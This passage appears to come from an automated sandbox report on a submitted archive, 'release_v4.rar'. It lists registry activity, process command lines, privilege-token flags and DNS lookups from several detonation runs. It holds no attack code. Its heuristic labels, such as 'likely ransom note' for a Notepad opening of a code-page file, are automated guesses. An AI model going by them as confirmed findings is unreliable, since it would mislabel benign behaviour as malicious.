| Key value queried | \REGISTRY\USER\S-1-5-21-2132103209-3755304320-2959162027-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2132103209-3755304320-2959162027-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3004 wrote to memory of 2060 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files\7-Zip\7zFM.exe |
| PID 3004 wrote to memory of 2060 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files\7-Zip\7zFM.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\release_v4.rar
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\release_v4.rar"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp |
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:57
Platform
win7-20240221-en
Max time kernel
122s
Max time network
125s
Command Line
Signatures
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Resource\TypeSupport\Unicode\Mappings\win\CP1250.txt
Network
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-02-23 11:52
Reported
2024-02-23 11:58
Platform
win10v2004-20240221-en
Max time kernel
132s
Max time network
155s
Command Line
Signatures
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Processes
C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Resource\TypeSupport\Unicode\Mappings\win\CP1250.txt
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.78.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.72.42.20.in-addr.arpa | udp |